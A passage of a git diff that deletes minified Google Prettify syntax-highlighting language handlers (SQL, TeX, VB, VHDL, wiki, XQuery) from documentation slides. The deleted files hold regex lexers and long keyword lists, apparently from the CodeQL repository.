-["lit",/^(?:true|false|null|this)\b/],["lit",/^(?:0(?:[0-7]+|x[\da-f]+)l?|(?:0|[1-9]\d*)(?:(?:\.\d+)?(?:e[+-]?\d+)?f?|l?)|\\.\d+(?:e[+-]?\d+)?f?)/i],["typ",/^[$_]*[A-Z][\d$A-Z_]*[a-z][\w$]*/],["pln",/^[$A-Z_a-z][\w$]*/],["com",/^\/(?:\/.*|\*(?:\/|\**[^*/])*(?:\*+\/?)?)/],["pun",/^(?:\.+|\/)/]]),["scala"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-sql.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-sql.js deleted file mode 100644 index da705b0b6780..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-sql.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\r \xa0]+/,null,"\t\n\r Â\xa0"],["str",/^(?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')/,null,"\"'"]],[["com",/^(?:--[^\n\r]*|\/\*[\S\s]*?(?:\*\/|$))/],["kwd",/^(?:add|all|alter|and|any|as|asc|authorization|backup|begin|between|break|browse|bulk|by|cascade|case|check|checkpoint|close|clustered|coalesce|collate|column|commit|compute|constraint|contains|containstable|continue|convert|create|cross|current|current_date|current_time|current_timestamp|current_user|cursor|database|dbcc|deallocate|declare|default|delete|deny|desc|disk|distinct|distributed|double|drop|dummy|dump|else|end|errlvl|escape|except|exec|execute|exists|exit|fetch|file|fillfactor|for|foreign|freetext|freetexttable|from|full|function|goto|grant|group|having|holdlock|identity|identitycol|identity_insert|if|in|index|inner|insert|intersect|into|is|join|key|kill|left|like|lineno|load|match|merge|national|nocheck|nonclustered|not|null|nullif|of|off|offsets|on|open|opendatasource|openquery|openrowset|openxml|option|or|order|outer|over|percent|plan|precision|primary|print|proc|procedure|public|raiserror|read|readtext|reconfigure|references|replication|restore|restrict|return|revoke|right|rollback|rowcount|rowguidcol|rule|save|schema|select|session_user|set|setuser|shutdown|some|statistics|system_user|table|textsize|then|to|top|tran|transaction|trigger|truncate|tsequal|union|unique|update|updatetext|use|user|using|values|varying|view|waitfor|when|where|while|with|writetext)(?=[^\w-]|$)/i, -null],["lit",/^[+-]?(?:0x[\da-f]+|(?:\.\d+|\d+(?:\.\d*)?)(?:e[+-]?\d+)?)/i],["pln",/^[_a-z][\w-]*/i],["pun",/^[^\w\t\n\r "'\xa0][^\w\t\n\r "'+\xa0-]*/]]),["sql"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-tex.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-tex.js deleted file mode 100644 index ce96fbbd1f4f..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-tex.js +++ /dev/null @@ -1 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\r \xa0]+/,null,"\t\n\r Â\xa0"],["com",/^%[^\n\r]*/,null,"%"]],[["kwd",/^\\[@-Za-z]+/],["kwd",/^\\./],["typ",/^[$&]/],["lit",/[+-]?(?:\.\d+|\d+(?:\.\d*)?)(cm|em|ex|in|pc|pt|bp|mm)/i],["pun",/^[()=[\]{}]+/]]),["latex","tex"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-vb.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-vb.js deleted file mode 100644 index 07506b03cd40..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-vb.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\r \xa0\u2028\u2029]+/,null,"\t\n\r Â\xa0

"],["str",/^(?:["\u201c\u201d](?:[^"\u201c\u201d]|["\u201c\u201d]{2})(?:["\u201c\u201d]c|$)|["\u201c\u201d](?:[^"\u201c\u201d]|["\u201c\u201d]{2})*(?:["\u201c\u201d]|$))/i,null,'"“â€'],["com",/^['\u2018\u2019].*/,null,"'‘’"]],[["kwd",/^(?:addhandler|addressof|alias|and|andalso|ansi|as|assembly|auto|boolean|byref|byte|byval|call|case|catch|cbool|cbyte|cchar|cdate|cdbl|cdec|char|cint|class|clng|cobj|const|cshort|csng|cstr|ctype|date|decimal|declare|default|delegate|dim|directcast|do|double|each|else|elseif|end|endif|enum|erase|error|event|exit|finally|for|friend|function|get|gettype|gosub|goto|handles|if|implements|imports|in|inherits|integer|interface|is|let|lib|like|long|loop|me|mod|module|mustinherit|mustoverride|mybase|myclass|namespace|new|next|not|notinheritable|notoverridable|object|on|option|optional|or|orelse|overloads|overridable|overrides|paramarray|preserve|private|property|protected|public|raiseevent|readonly|redim|removehandler|resume|return|select|set|shadows|shared|short|single|static|step|stop|string|structure|sub|synclock|then|throw|to|try|typeof|unicode|until|variant|wend|when|while|with|withevents|writeonly|xor|endif|gosub|let|variant|wend)\b/i, -null],["com",/^rem.*/i],["lit",/^(?:true\b|false\b|nothing\b|\d+(?:e[+-]?\d+[dfr]?|[dfilrs])?|(?:&h[\da-f]+|&o[0-7]+)[ils]?|\d*\.\d+(?:e[+-]?\d+)?[dfr]?|#\s+(?:\d+[/-]\d+[/-]\d+(?:\s+\d+:\d+(?::\d+)?(\s*(?:am|pm))?)?|\d+:\d+(?::\d+)?(\s*(?:am|pm))?)\s+#)/i],["pln",/^(?:(?:[a-z]|_\w)\w*|\[(?:[a-z]|_\w)\w*])/i],["pun",/^[^\w\t\n\r "'[\]\xa0\u2018\u2019\u201c\u201d\u2028\u2029]+/],["pun",/^(?:\[|])/]]),["vb","vbs"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-vhdl.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-vhdl.js deleted file mode 100644 index 128b5b6cfc2f..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-vhdl.js +++ /dev/null @@ -1,3 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\r \xa0]+/,null,"\t\n\r Â\xa0"]],[["str",/^(?:[box]?"(?:[^"]|"")*"|'.')/i],["com",/^--[^\n\r]*/],["kwd",/^(?:abs|access|after|alias|all|and|architecture|array|assert|attribute|begin|block|body|buffer|bus|case|component|configuration|constant|disconnect|downto|else|elsif|end|entity|exit|file|for|function|generate|generic|group|guarded|if|impure|in|inertial|inout|is|label|library|linkage|literal|loop|map|mod|nand|new|next|nor|not|null|of|on|open|or|others|out|package|port|postponed|procedure|process|pure|range|record|register|reject|rem|report|return|rol|ror|select|severity|shared|signal|sla|sll|sra|srl|subtype|then|to|transport|type|unaffected|units|until|use|variable|wait|when|while|with|xnor|xor)(?=[^\w-]|$)/i, -null],["typ",/^(?:bit|bit_vector|character|boolean|integer|real|time|string|severity_level|positive|natural|signed|unsigned|line|text|std_u?logic(?:_vector)?)(?=[^\w-]|$)/i,null],["typ",/^'(?:active|ascending|base|delayed|driving|driving_value|event|high|image|instance_name|last_active|last_event|last_value|left|leftof|length|low|path_name|pos|pred|quiet|range|reverse_range|right|rightof|simple_name|stable|succ|transaction|val|value)(?=[^\w-]|$)/i,null],["lit",/^\d+(?:_\d+)*(?:#[\w.\\]+#(?:[+-]?\d+(?:_\d+)*)?|(?:\.\d+(?:_\d+)*)?(?:e[+-]?\d+(?:_\d+)*)?)/i], -["pln",/^(?:[a-z]\w*|\\[^\\]*\\)/i],["pun",/^[^\w\t\n\r "'\xa0][^\w\t\n\r "'\xa0-]*/]]),["vhdl","vhd"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-wiki.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-wiki.js deleted file mode 100644 index 9b0b44873f0f..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-wiki.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\d\t a-gi-z\xa0]+/,null,"\t Â\xa0abcdefgijklmnopqrstuvwxyz0123456789"],["pun",/^[*=[\]^~]+/,null,"=*~^[]"]],[["lang-wiki.meta",/(?:^^|\r\n?|\n)(#[a-z]+)\b/],["lit",/^[A-Z][a-z][\da-z]+[A-Z][a-z][^\W_]+\b/],["lang-",/^{{{([\S\s]+?)}}}/],["lang-",/^`([^\n\r`]+)`/],["str",/^https?:\/\/[^\s#/?]*(?:\/[^\s#?]*)?(?:\?[^\s#]*)?(?:#\S*)?/i],["pln",/^(?:\r\n|[\S\s])[^\n\r#*=A-[^`h{~]*/]]),["wiki"]); -PR.registerLangHandler(PR.createSimpleLexer([["kwd",/^#[a-z]+/i,null,"#"]],[]),["wiki.meta"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-xq.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-xq.js deleted file mode 100644 index e323ae323705..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-xq.js +++ /dev/null @@ -1,3 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["var pln",/^\$[\w-]+/,null,"$"]],[["pln",/^[\s=][<>][\s=]/],["lit",/^@[\w-]+/],["tag",/^<\/?[a-z](?:[\w-.:]*\w)?|\/?>$/i],["com",/^\(:[\S\s]*?:\)/],["pln",/^[(),/;[\]{}]$/],["str",/^(?:"(?:[^"\\{]|\\[\S\s])*(?:"|$)|'(?:[^'\\{]|\\[\S\s])*(?:'|$))/,null,"\"'"],["kwd",/^(?:xquery|where|version|variable|union|typeswitch|treat|to|then|text|stable|sortby|some|self|schema|satisfies|returns|return|ref|processing-instruction|preceding-sibling|preceding|precedes|parent|only|of|node|namespace|module|let|item|intersect|instance|in|import|if|function|for|follows|following-sibling|following|external|except|every|else|element|descending|descendant-or-self|descendant|define|default|declare|comment|child|cast|case|before|attribute|assert|ascending|as|ancestor-or-self|ancestor|after|eq|order|by|or|and|schema-element|document-node|node|at)\b/], -["typ",/^(?:xs:yearMonthDuration|xs:unsignedLong|xs:time|xs:string|xs:short|xs:QName|xs:Name|xs:long|xs:integer|xs:int|xs:gYearMonth|xs:gYear|xs:gMonthDay|xs:gDay|xs:float|xs:duration|xs:double|xs:decimal|xs:dayTimeDuration|xs:dateTime|xs:date|xs:byte|xs:boolean|xs:anyURI|xf:yearMonthDuration)\b/,null],["fun pln",/^(?:xp:dereference|xinc:node-expand|xinc:link-references|xinc:link-expand|xhtml:restructure|xhtml:clean|xhtml:add-lists|xdmp:zip-manifest|xdmp:zip-get|xdmp:zip-create|xdmp:xquery-version|xdmp:word-convert|xdmp:with-namespaces|xdmp:version|xdmp:value|xdmp:user-roles|xdmp:user-last-login|xdmp:user|xdmp:url-encode|xdmp:url-decode|xdmp:uri-is-file|xdmp:uri-format|xdmp:uri-content-type|xdmp:unquote|xdmp:unpath|xdmp:triggers-database|xdmp:trace|xdmp:to-json|xdmp:tidy|xdmp:subbinary|xdmp:strftime|xdmp:spawn-in|xdmp:spawn|xdmp:sleep|xdmp:shutdown|xdmp:set-session-field|xdmp:set-response-encoding|xdmp:set-response-content-type|xdmp:set-response-code|xdmp:set-request-time-limit|xdmp:set|xdmp:servers|xdmp:server-status|xdmp:server-name|xdmp:server|xdmp:security-database|xdmp:security-assert|xdmp:schema-database|xdmp:save|xdmp:role-roles|xdmp:role|xdmp:rethrow|xdmp:restart|xdmp:request-timestamp|xdmp:request-status|xdmp:request-cancel|xdmp:request|xdmp:redirect-response|xdmp:random|xdmp:quote|xdmp:query-trace|xdmp:query-meters|xdmp:product-edition|xdmp:privilege-roles|xdmp:privilege|xdmp:pretty-print|xdmp:powerpoint-convert|xdmp:platform|xdmp:permission|xdmp:pdf-convert|xdmp:path|xdmp:octal-to-integer|xdmp:node-uri|xdmp:node-replace|xdmp:node-kind|xdmp:node-insert-child|xdmp:node-insert-before|xdmp:node-insert-after|xdmp:node-delete|xdmp:node-database|xdmp:mul64|xdmp:modules-root|xdmp:modules-database|xdmp:merging|xdmp:merge-cancel|xdmp:merge|xdmp:md5|xdmp:logout|xdmp:login|xdmp:log-level|xdmp:log|xdmp:lock-release|xdmp:lock-acquire|xdmp:load|xdmp:invoke-in|xdmp:invoke|xdmp:integer-to-octal|xdmp:integer-to-hex|xdmp:http-put|xdmp:http-post|xdmp:http-options|xdmp:http-head|xdmp:http-get|xdmp:http-delete|xdmp:hosts|xdmp:host-status|xdmp:host-name|xdmp:host|xdmp:hex-to-integer|xdmp:hash64|xdmp:hash32|xdmp:has-privilege|xdmp:groups|xdmp:group-serves|xdmp:group-servers|xdmp:group-name|xdmp:group-hosts|xdmp:group|xdmp:get-session-field-names|xdmp:get-session-field|xdmp:get-response-encoding|xdmp:get-response-code|xdmp:get-request-username|xdmp:get-request-user|xdmp:get-request-url|xdmp:get-request-protocol|xdmp:get-request-path|xdmp:get-request-method|xdmp:get-request-header-names|xdmp:get-request-header|xdmp:get-request-field-names|xdmp:get-request-field-filename|xdmp:get-request-field-content-type|xdmp:get-request-field|xdmp:get-request-client-certificate|xdmp:get-request-client-address|xdmp:get-request-body|xdmp:get-current-user|xdmp:get-current-roles|xdmp:get|xdmp:function-name|xdmp:function-module|xdmp:function|xdmp:from-json|xdmp:forests|xdmp:forest-status|xdmp:forest-restore|xdmp:forest-restart|xdmp:forest-name|xdmp:forest-delete|xdmp:forest-databases|xdmp:forest-counts|xdmp:forest-clear|xdmp:forest-backup|xdmp:forest|xdmp:filesystem-file|xdmp:filesystem-directory|xdmp:exists|xdmp:excel-convert|xdmp:eval-in|xdmp:eval|xdmp:estimate|xdmp:email|xdmp:element-content-type|xdmp:elapsed-time|xdmp:document-set-quality|xdmp:document-set-property|xdmp:document-set-properties|xdmp:document-set-permissions|xdmp:document-set-collections|xdmp:document-remove-properties|xdmp:document-remove-permissions|xdmp:document-remove-collections|xdmp:document-properties|xdmp:document-locks|xdmp:document-load|xdmp:document-insert|xdmp:document-get-quality|xdmp:document-get-properties|xdmp:document-get-permissions|xdmp:document-get-collections|xdmp:document-get|xdmp:document-forest|xdmp:document-delete|xdmp:document-add-properties|xdmp:document-add-permissions|xdmp:document-add-collections|xdmp:directory-properties|xdmp:directory-locks|xdmp:directory-delete|xdmp:directory-create|xdmp:directory|xdmp:diacritic-less|xdmp:describe|xdmp:default-permissions|xdmp:default-collections|xdmp:databases|xdmp:database-restore-validate|xdmp:database-restore-status|xdmp:database-restore-cancel|xdmp:database-restore|xdmp:database-name|xdmp:database-forests|xdmp:database-backup-validate|xdmp:database-backup-status|xdmp:database-backup-purge|xdmp:database-backup-cancel|xdmp:database-backup|xdmp:database|xdmp:collection-properties|xdmp:collection-locks|xdmp:collection-delete|xdmp:collation-canonical-uri|xdmp:castable-as|xdmp:can-grant-roles|xdmp:base64-encode|xdmp:base64-decode|xdmp:architecture|xdmp:apply|xdmp:amp-roles|xdmp:amp|xdmp:add64|xdmp:add-response-header|xdmp:access|trgr:trigger-set-recursive|trgr:trigger-set-permissions|trgr:trigger-set-name|trgr:trigger-set-module|trgr:trigger-set-event|trgr:trigger-set-description|trgr:trigger-remove-permissions|trgr:trigger-module|trgr:trigger-get-permissions|trgr:trigger-enable|trgr:trigger-disable|trgr:trigger-database-online-event|trgr:trigger-data-event|trgr:trigger-add-permissions|trgr:remove-trigger|trgr:property-content|trgr:pre-commit|trgr:post-commit|trgr:get-trigger-by-id|trgr:get-trigger|trgr:document-scope|trgr:document-content|trgr:directory-scope|trgr:create-trigger|trgr:collection-scope|trgr:any-property-content|thsr:set-entry|thsr:remove-term|thsr:remove-synonym|thsr:remove-entry|thsr:query-lookup|thsr:lookup|thsr:load|thsr:insert|thsr:expand|thsr:add-synonym|spell:suggest-detailed|spell:suggest|spell:remove-word|spell:make-dictionary|spell:load|spell:levenshtein-distance|spell:is-correct|spell:insert|spell:double-metaphone|spell:add-word|sec:users-collection|sec:user-set-roles|sec:user-set-password|sec:user-set-name|sec:user-set-description|sec:user-set-default-permissions|sec:user-set-default-collections|sec:user-remove-roles|sec:user-privileges|sec:user-get-roles|sec:user-get-description|sec:user-get-default-permissions|sec:user-get-default-collections|sec:user-doc-permissions|sec:user-doc-collections|sec:user-add-roles|sec:unprotect-collection|sec:uid-for-name|sec:set-realm|sec:security-version|sec:security-namespace|sec:security-installed|sec:security-collection|sec:roles-collection|sec:role-set-roles|sec:role-set-name|sec:role-set-description|sec:role-set-default-permissions|sec:role-set-default-collections|sec:role-remove-roles|sec:role-privileges|sec:role-get-roles|sec:role-get-description|sec:role-get-default-permissions|sec:role-get-default-collections|sec:role-doc-permissions|sec:role-doc-collections|sec:role-add-roles|sec:remove-user|sec:remove-role-from-users|sec:remove-role-from-role|sec:remove-role-from-privileges|sec:remove-role-from-amps|sec:remove-role|sec:remove-privilege|sec:remove-amp|sec:protect-collection|sec:privileges-collection|sec:privilege-set-roles|sec:privilege-set-name|sec:privilege-remove-roles|sec:privilege-get-roles|sec:privilege-add-roles|sec:priv-doc-permissions|sec:priv-doc-collections|sec:get-user-names|sec:get-unique-elem-id|sec:get-role-names|sec:get-role-ids|sec:get-privilege|sec:get-distinct-permissions|sec:get-collection|sec:get-amp|sec:create-user-with-role|sec:create-user|sec:create-role|sec:create-privilege|sec:create-amp|sec:collections-collection|sec:collection-set-permissions|sec:collection-remove-permissions|sec:collection-get-permissions|sec:collection-add-permissions|sec:check-admin|sec:amps-collection|sec:amp-set-roles|sec:amp-remove-roles|sec:amp-get-roles|sec:amp-doc-permissions|sec:amp-doc-collections|sec:amp-add-roles|search:unparse|search:suggest|search:snippet|search:search|search:resolve-nodes|search:resolve|search:remove-constraint|search:parse|search:get-default-options|search:estimate|search:check-options|prof:value|prof:reset|prof:report|prof:invoke|prof:eval|prof:enable|prof:disable|prof:allowed|ppt:clean|pki:template-set-request|pki:template-set-name|pki:template-set-key-type|pki:template-set-key-options|pki:template-set-description|pki:template-in-use|pki:template-get-version|pki:template-get-request|pki:template-get-name|pki:template-get-key-type|pki:template-get-key-options|pki:template-get-id|pki:template-get-description|pki:need-certificate|pki:is-temporary|pki:insert-trusted-certificates|pki:insert-template|pki:insert-signed-certificates|pki:insert-certificate-revocation-list|pki:get-trusted-certificate-ids|pki:get-template-ids|pki:get-template-certificate-authority|pki:get-template-by-name|pki:get-template|pki:get-pending-certificate-requests-xml|pki:get-pending-certificate-requests-pem|pki:get-pending-certificate-request|pki:get-certificates-for-template-xml|pki:get-certificates-for-template|pki:get-certificates|pki:get-certificate-xml|pki:get-certificate-pem|pki:get-certificate|pki:generate-temporary-certificate-if-necessary|pki:generate-temporary-certificate|pki:generate-template-certificate-authority|pki:generate-certificate-request|pki:delete-template|pki:delete-certificate|pki:create-template|pdf:make-toc|pdf:insert-toc-headers|pdf:get-toc|pdf:clean|p:status-transition|p:state-transition|p:remove|p:pipelines|p:insert|p:get-by-id|p:get|p:execute|p:create|p:condition|p:collection|p:action|ooxml:runs-merge|ooxml:package-uris|ooxml:package-parts-insert|ooxml:package-parts|msword:clean|mcgm:polygon|mcgm:point|mcgm:geospatial-query-from-elements|mcgm:geospatial-query|mcgm:circle|math:tanh|math:tan|math:sqrt|math:sinh|math:sin|math:pow|math:modf|math:log10|math:log|math:ldexp|math:frexp|math:fmod|math:floor|math:fabs|math:exp|math:cosh|math:cos|math:ceil|math:atan2|math:atan|math:asin|math:acos|map:put|map:map|map:keys|map:get|map:delete|map:count|map:clear|lnk:to|lnk:remove|lnk:insert|lnk:get|lnk:from|lnk:create|kml:polygon|kml:point|kml:interior-polygon|kml:geospatial-query-from-elements|kml:geospatial-query|kml:circle|kml:box|gml:polygon|gml:point|gml:interior-polygon|gml:geospatial-query-from-elements|gml:geospatial-query|gml:circle|gml:box|georss:point|georss:geospatial-query|georss:circle|geo:polygon|geo:point|geo:interior-polygon|geo:geospatial-query-from-elements|geo:geospatial-query|geo:circle|geo:box|fn:zero-or-one|fn:years-from-duration|fn:year-from-dateTime|fn:year-from-date|fn:upper-case|fn:unordered|fn:true|fn:translate|fn:trace|fn:tokenize|fn:timezone-from-time|fn:timezone-from-dateTime|fn:timezone-from-date|fn:sum|fn:subtract-dateTimes-yielding-yearMonthDuration|fn:subtract-dateTimes-yielding-dayTimeDuration|fn:substring-before|fn:substring-after|fn:substring|fn:subsequence|fn:string-to-codepoints|fn:string-pad|fn:string-length|fn:string-join|fn:string|fn:static-base-uri|fn:starts-with|fn:seconds-from-time|fn:seconds-from-duration|fn:seconds-from-dateTime|fn:round-half-to-even|fn:round|fn:root|fn:reverse|fn:resolve-uri|fn:resolve-QName|fn:replace|fn:remove|fn:QName|fn:prefix-from-QName|fn:position|fn:one-or-more|fn:number|fn:not|fn:normalize-unicode|fn:normalize-space|fn:node-name|fn:node-kind|fn:nilled|fn:namespace-uri-from-QName|fn:namespace-uri-for-prefix|fn:namespace-uri|fn:name|fn:months-from-duration|fn:month-from-dateTime|fn:month-from-date|fn:minutes-from-time|fn:minutes-from-duration|fn:minutes-from-dateTime|fn:min|fn:max|fn:matches|fn:lower-case|fn:local-name-from-QName|fn:local-name|fn:last|fn:lang|fn:iri-to-uri|fn:insert-before|fn:index-of|fn:in-scope-prefixes|fn:implicit-timezone|fn:idref|fn:id|fn:hours-from-time|fn:hours-from-duration|fn:hours-from-dateTime|fn:floor|fn:false|fn:expanded-QName|fn:exists|fn:exactly-one|fn:escape-uri|fn:escape-html-uri|fn:error|fn:ends-with|fn:encode-for-uri|fn:empty|fn:document-uri|fn:doc-available|fn:doc|fn:distinct-values|fn:distinct-nodes|fn:default-collation|fn:deep-equal|fn:days-from-duration|fn:day-from-dateTime|fn:day-from-date|fn:data|fn:current-time|fn:current-dateTime|fn:current-date|fn:count|fn:contains|fn:concat|fn:compare|fn:collection|fn:codepoints-to-string|fn:codepoint-equal|fn:ceiling|fn:boolean|fn:base-uri|fn:avg|fn:adjust-time-to-timezone|fn:adjust-dateTime-to-timezone|fn:adjust-date-to-timezone|fn:abs|feed:unsubscribe|feed:subscription|feed:subscribe|feed:request|feed:item|feed:description|excel:clean|entity:enrich|dom:set-pipelines|dom:set-permissions|dom:set-name|dom:set-evaluation-context|dom:set-domain-scope|dom:set-description|dom:remove-pipeline|dom:remove-permissions|dom:remove|dom:get|dom:evaluation-context|dom:domains|dom:domain-scope|dom:create|dom:configuration-set-restart-user|dom:configuration-set-permissions|dom:configuration-set-evaluation-context|dom:configuration-set-default-domain|dom:configuration-get|dom:configuration-create|dom:collection|dom:add-pipeline|dom:add-permissions|dls:retention-rules|dls:retention-rule-remove|dls:retention-rule-insert|dls:retention-rule|dls:purge|dls:node-expand|dls:link-references|dls:link-expand|dls:documents-query|dls:document-versions-query|dls:document-version-uri|dls:document-version-query|dls:document-version-delete|dls:document-version-as-of|dls:document-version|dls:document-update|dls:document-unmanage|dls:document-set-quality|dls:document-set-property|dls:document-set-properties|dls:document-set-permissions|dls:document-set-collections|dls:document-retention-rules|dls:document-remove-properties|dls:document-remove-permissions|dls:document-remove-collections|dls:document-purge|dls:document-manage|dls:document-is-managed|dls:document-insert-and-manage|dls:document-include-query|dls:document-history|dls:document-get-permissions|dls:document-extract-part|dls:document-delete|dls:document-checkout-status|dls:document-checkout|dls:document-checkin|dls:document-add-properties|dls:document-add-permissions|dls:document-add-collections|dls:break-checkout|dls:author-query|dls:as-of-query|dbk:convert|dbg:wait|dbg:value|dbg:stopped|dbg:stop|dbg:step|dbg:status|dbg:stack|dbg:out|dbg:next|dbg:line|dbg:invoke|dbg:function|dbg:finish|dbg:expr|dbg:eval|dbg:disconnect|dbg:detach|dbg:continue|dbg:connect|dbg:clear|dbg:breakpoints|dbg:break|dbg:attached|dbg:attach|cvt:save-converted-documents|cvt:part-uri|cvt:destination-uri|cvt:basepath|cvt:basename|cts:words|cts:word-query-weight|cts:word-query-text|cts:word-query-options|cts:word-query|cts:word-match|cts:walk|cts:uris|cts:uri-match|cts:train|cts:tokenize|cts:thresholds|cts:stem|cts:similar-query-weight|cts:similar-query-nodes|cts:similar-query|cts:shortest-distance|cts:search|cts:score|cts:reverse-query-weight|cts:reverse-query-nodes|cts:reverse-query|cts:remainder|cts:registered-query-weight|cts:registered-query-options|cts:registered-query-ids|cts:registered-query|cts:register|cts:query|cts:quality|cts:properties-query-query|cts:properties-query|cts:polygon-vertices|cts:polygon|cts:point-longitude|cts:point-latitude|cts:point|cts:or-query-queries|cts:or-query|cts:not-query-weight|cts:not-query-query|cts:not-query|cts:near-query-weight|cts:near-query-queries|cts:near-query-options|cts:near-query-distance|cts:near-query|cts:highlight|cts:geospatial-co-occurrences|cts:frequency|cts:fitness|cts:field-words|cts:field-word-query-weight|cts:field-word-query-text|cts:field-word-query-options|cts:field-word-query-field-name|cts:field-word-query|cts:field-word-match|cts:entity-highlight|cts:element-words|cts:element-word-query-weight|cts:element-word-query-text|cts:element-word-query-options|cts:element-word-query-element-name|cts:element-word-query|cts:element-word-match|cts:element-values|cts:element-value-ranges|cts:element-value-query-weight|cts:element-value-query-text|cts:element-value-query-options|cts:element-value-query-element-name|cts:element-value-query|cts:element-value-match|cts:element-value-geospatial-co-occurrences|cts:element-value-co-occurrences|cts:element-range-query-weight|cts:element-range-query-value|cts:element-range-query-options|cts:element-range-query-operator|cts:element-range-query-element-name|cts:element-range-query|cts:element-query-query|cts:element-query-element-name|cts:element-query|cts:element-pair-geospatial-values|cts:element-pair-geospatial-value-match|cts:element-pair-geospatial-query-weight|cts:element-pair-geospatial-query-region|cts:element-pair-geospatial-query-options|cts:element-pair-geospatial-query-longitude-name|cts:element-pair-geospatial-query-latitude-name|cts:element-pair-geospatial-query-element-name|cts:element-pair-geospatial-query|cts:element-pair-geospatial-boxes|cts:element-geospatial-values|cts:element-geospatial-value-match|cts:element-geospatial-query-weight|cts:element-geospatial-query-region|cts:element-geospatial-query-options|cts:element-geospatial-query-element-name|cts:element-geospatial-query|cts:element-geospatial-boxes|cts:element-child-geospatial-values|cts:element-child-geospatial-value-match|cts:element-child-geospatial-query-weight|cts:element-child-geospatial-query-region|cts:element-child-geospatial-query-options|cts:element-child-geospatial-query-element-name|cts:element-child-geospatial-query-child-name|cts:element-child-geospatial-query|cts:element-child-geospatial-boxes|cts:element-attribute-words|cts:element-attribute-word-query-weight|cts:element-attribute-word-query-text|cts:element-attribute-word-query-options|cts:element-attribute-word-query-element-name|cts:element-attribute-word-query-attribute-name|cts:element-attribute-word-query|cts:element-attribute-word-match|cts:element-attribute-values|cts:element-attribute-value-ranges|cts:element-attribute-value-query-weight|cts:element-attribute-value-query-text|cts:element-attribute-value-query-options|cts:element-attribute-value-query-element-name|cts:element-attribute-value-query-attribute-name|cts:element-attribute-value-query|cts:element-attribute-value-match|cts:element-attribute-value-geospatial-co-occurrences|cts:element-attribute-value-co-occurrences|cts:element-attribute-range-query-weight|cts:element-attribute-range-query-value|cts:element-attribute-range-query-options|cts:element-attribute-range-query-operator|cts:element-attribute-range-query-element-name|cts:element-attribute-range-query-attribute-name|cts:element-attribute-range-query|cts:element-attribute-pair-geospatial-values|cts:element-attribute-pair-geospatial-value-match|cts:element-attribute-pair-geospatial-query-weight|cts:element-attribute-pair-geospatial-query-region|cts:element-attribute-pair-geospatial-query-options|cts:element-attribute-pair-geospatial-query-longitude-name|cts:element-attribute-pair-geospatial-query-latitude-name|cts:element-attribute-pair-geospatial-query-element-name|cts:element-attribute-pair-geospatial-query|cts:element-attribute-pair-geospatial-boxes|cts:document-query-uris|cts:document-query|cts:distance|cts:directory-query-uris|cts:directory-query-depth|cts:directory-query|cts:destination|cts:deregister|cts:contains|cts:confidence|cts:collections|cts:collection-query-uris|cts:collection-query|cts:collection-match|cts:classify|cts:circle-radius|cts:circle-center|cts:circle|cts:box-west|cts:box-south|cts:box-north|cts:box-east|cts:box|cts:bearing|cts:arc-intersection|cts:and-query-queries|cts:and-query-options|cts:and-query|cts:and-not-query-positive-query|cts:and-not-query-negative-query|cts:and-not-query|css:get|css:convert|cpf:success|cpf:failure|cpf:document-set-state|cpf:document-set-processing-status|cpf:document-set-last-updated|cpf:document-set-error|cpf:document-get-state|cpf:document-get-processing-status|cpf:document-get-last-updated|cpf:document-get-error|cpf:check-transition|alert:spawn-matching-actions|alert:rule-user-id-query|alert:rule-set-user-id|alert:rule-set-query|alert:rule-set-options|alert:rule-set-name|alert:rule-set-description|alert:rule-set-action|alert:rule-remove|alert:rule-name-query|alert:rule-insert|alert:rule-id-query|alert:rule-get-user-id|alert:rule-get-query|alert:rule-get-options|alert:rule-get-name|alert:rule-get-id|alert:rule-get-description|alert:rule-get-action|alert:rule-action-query|alert:remove-triggers|alert:make-rule|alert:make-log-action|alert:make-config|alert:make-action|alert:invoke-matching-actions|alert:get-my-rules|alert:get-all-rules|alert:get-actions|alert:find-matching-rules|alert:create-triggers|alert:config-set-uri|alert:config-set-trigger-ids|alert:config-set-options|alert:config-set-name|alert:config-set-description|alert:config-set-cpf-domain-names|alert:config-set-cpf-domain-ids|alert:config-insert|alert:config-get-uri|alert:config-get-trigger-ids|alert:config-get-options|alert:config-get-name|alert:config-get-id|alert:config-get-description|alert:config-get-cpf-domain-names|alert:config-get-cpf-domain-ids|alert:config-get|alert:config-delete|alert:action-set-options|alert:action-set-name|alert:action-set-module-root|alert:action-set-module-db|alert:action-set-module|alert:action-set-description|alert:action-remove|alert:action-insert|alert:action-get-options|alert:action-get-name|alert:action-get-module-root|alert:action-get-module-db|alert:action-get-module|alert:action-get-description|zero-o